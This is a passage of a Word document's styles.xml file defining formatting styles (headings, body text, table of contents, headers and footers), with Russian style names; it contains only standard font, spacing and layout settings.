      <w:rFonts w:eastAsia="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CellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="0" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="0" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="numbering" w:default="1" w:styleId="a2">
    <w:name w:val="No List"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="Заголовок 2 Знак"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="Заголовок 1 Знак"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="32"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a3">
    <w:name w:val="Основной текст_"/>
    <w:link w:val="81"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="21">
    <w:name w:val="Основной текст2"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Arial4pt">
    <w:name w:val="Основной текст + Arial;4 pt"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="8"/>
      <w:szCs w:val="8"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="2pt">
    <w:name w:val="Основной текст + Интервал 2 pt"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="40"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="ru-RU" w:eastAsia="ru-RU" w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BookmanOldStyle105pt-1pt">
    <w:name w:val="Основной текст + Bookman Old Style;10;5 pt;Интервал -1 pt"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:eastAsia="Bookman Old Style" w:hAnsi="Bookman Old Style" w:cs="Bookman Old Style"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="-20"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="81">
    <w:name w:val="Основной текст8"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a3"/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="120" w:line="192" w:lineRule="exact"/>
      <w:ind w:hanging="300"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="14"/>
      <w:szCs w:val="14"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a4">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a6">
    <w:name w:val="Текст выноски Знак"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="a"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="0" w:line="276" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="365F91"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:spacing w:after="100" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Emphasis"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ab">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ac">
    <w:name w:val="Колонтитул"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:color w:val="FFFFFF"/>
      <w:spacing w:val="-10"/>
      <w:w w:val="100"/>
      <w:position w:val="0"/>
      <w:sz w:val="23"/>
      <w:szCs w:val="23"/>
      <w:u w:val="none"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Tahoma7pt0pt">
    <w:name w:val="Колонтитул + Tahoma;7 pt;Интервал 0 pt"/>
    <w:rsid w:val="00B45DB0"/>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paragraph" w:styleId="ad">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="ae"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ae">
    <w:name w:val="Основной текст Знак"/>
    <w:link w:val="ad"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="Заголовок 3 Знак"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="50">
    <w:name w:val="Заголовок 5 Знак"/>
    <w:link w:val="5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="243F60"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableNormal">
    <w:name w:val="Table Normal"/>
    <w:uiPriority w:val="2"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>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45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:line="278" w:lineRule="exact"/>
      <w:ind w:left="171"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="af">
    <w:name w:val="Strong"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af0">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af1"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af1">
    <w:name w:val="Верхний колонтитул Знак"/>
    <w:link w:val="af0"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af2">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af3"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4677"/>
        <w:tab w:val="right" w:pos="9355"/>
      </w:tabs>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af3">
    <w:name w:val="Нижний колонтитул Знак"/>
    <w:link w:val="af2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af4">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="af5"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af5">
    <w:name w:val="Основной текст с отступом Знак"/>
    <w:link w:val="af4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00B45DB0"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t22">
    <w:name w:val="t22"/>
    <w:rsid w:val="00B45DB0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t29">
    <w:name w:val="t29"/>
    <w:rsid w:val="00B45DB0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="t43">
    <w:name w:val="t43"/>
    <w:rsid w:val="00B45DB0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="31">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="110">
    <w:name w:val="Заголовок 11"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00B45DB0"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:ind w:left="306"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:bidi="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="24"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00523CE5"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="120" w:line="480" w:lineRule="auto"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="24">
    <w:name w:val="Основной текст с отступом 2 Знак"/>
    <w:link w:val="23"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00523CE5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="32">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="33"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:after="120"/>
      <w:ind w:left="283"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="33">
    <w:name w:val="Основной текст с отступом 3 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="32"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="40">
    <w:name w:val="Заголовок 4 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="60">
    <w:name w:val="Заголовок 6 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="6"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="70">
    <w:name w:val="Заголовок 7 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="7"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="80">
    <w:name w:val="Заголовок 8 Знак"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="8"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af6">
    <w:name w:val="caption"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="35"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="af7">
    <w:basedOn w:val="a"/>
    <w:next w:val="af8"/>
    <w:link w:val="af9"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="851"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="17365D"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="af9">
    <w:name w:val="Название Знак"/>
    <w:link w:val="af7"/>
    <w:uiPriority w:val="10"/>
    <w:rsid w:val="002C1237"/>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:color w:val="17365D"/>
      <w:spacing w:val="5"/>
      <w:kern w:val="28"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="afa">
    <w:name w:val="a"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="acxspfirst">
    <w:name w:val="acxspfirst"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="acxspmiddle">
    <w:name w:val="acxspmiddle"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="acxsplast">
    <w:name w:val="acxsplast"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="002C1237"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
